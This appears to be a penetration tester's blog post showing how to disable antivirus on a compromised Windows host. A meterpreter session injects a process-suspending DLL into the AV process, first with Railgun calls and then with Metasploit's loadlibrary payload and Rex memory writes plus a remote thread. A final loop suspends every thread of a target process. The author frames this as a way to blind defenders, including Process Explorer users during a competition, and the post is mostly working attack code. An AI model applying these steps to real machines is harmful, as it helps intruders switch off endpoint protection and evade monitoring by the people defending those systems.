Recently Didier Stevens wrote 'Suspender.dll' which is a DLL that will suspend a process and all of it's child processes after a delay.
60 seconds is it's default but you can rename the DLL to add a number (as such 'Suspender10.dll' for 10 seconds) to make the delay whatever you wish. You can find the blog post and download here: http://blog.didierstevens.com/2011/04/27/suspender-dll/
Jonathan Cran and I had the same idea, as I'm sure many others did as well. This might work against AntiVirus setups that protect themselves from being killed or their services stopped.
I still stand by my original claim that just removing it is easier (Blog Post: Silently Uninstall SEP). However that might be something the user notices (A little shield disappearing).
Well, I didn't know how to do this with meterpreter so a bit of Google fu landed me on: http://www.codeproject.com/KB/threads/winspy.aspx which has 3 different ways to attack the 2nd of which used a DLL (score!)
Using IRB within a meterpreter shell I started using Railgun (because once you know something sometimes its easy not too look for other solutions)
I start off setting up some variables after I've uploaded Suspender.dll:
pid = 1436 sizeofsuspend = 52376 pathtosuspend = "C:\\Docume~1\\Administrator\\Desktop\\Suspender10.dll"
Next up we need to open a handle on the target process:
handle = client.railgun.kernel32.OpenProcess(PROCESS_ALL_ACCESS,false,pid)["return"]
With the handle we allocate some memory in the remote process for our DLL to live in:
allocatedmem = client.railgun.kernel32.VirtualAllocEx(handle,nil,sizeofsuspend,MEM_COMMIT,PAGE_READWRITE)["return"]
Writing that DLL to memory isn't much harder: (this and the previous step is the wrong way to do things as we'll see later)
Here is the hard part. We have to somehow figure out the address LoadLibraryA in the remote processes memory space, accounting for ASLR then pass it the location in memory where our DLL is hiding. Yah, I couldn't figure this one out, here is the best I did:
Then I got a friendly reminder by HD that most of this was built into meterpreter already so all that railgun nastness boils down to someting a lot simpler. Set the variables again:
pid = 1436 pathtosuspend = "C:\\Docume~1\\Administrator\\Desktop\\Suspender10.dll"
But this time we are going to use the loadlibrary payload that just got added to Metasploit Framework in r12765. We generate the payload with it pointing at our Suspender DLL:
pay = client.framework.payloads.create("windows/loadlibrary") pay.datastore['DLL'] = pathtosuspend pay.datastore['EXITFUNC'] = 'thread' raw = pay.generate
Open the process, this time with Rex:
targetprocess = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
Allocate the memory in the remote process write the payload (not our DLL) into that space:
mem = targetprocess.memory.allocate(raw.length + (raw.length % 1024)) targetprocess.memory.write(mem, raw)
And finally create the remote thread.. MUCH easier (The power of Rex even over Railgun)
And 10 seconds later our AV and all it's children processes stop. Suspended by Didier's Suspender.DLL. Thanks to HD for the slap in the head that I was doing things the wrong way and the 1 AM update to the framework that made this possible.
One of the things that sets that method apart is the fact that the suspension (once the DLL injection occurs) comes from within the process, and it suspends all the child processes as well.
Another way you can do this without the injection is just sending a suspend to all the threads in the process.
pid = 2980 targetprocess = client.sys.process.open(pid, PROCESS_ALL_ACCESS) targetprocess.thread.each_thread do |x| targetprocess.thread.open(x).suspend end
We open the process just like we did before, and make a very simple 'each_thread' loop. There are a few AVs engines that detected this as tampering. But if you target isn't AV... Say it's Process Explorer during CCDC, this might just confuse them enough to buy you some time to do other things without their watchful eye on you.
The other cool thing that happened when I did this was Process Explorer didn't detect the process as suspended. If you looked under the thread list they were all suspended but not the process itself according to Process Explorer.
Not rocket science at all, but that's because it's built into the framework. Just another thing that metasploit makes dead simple.
Cross-posted from Room362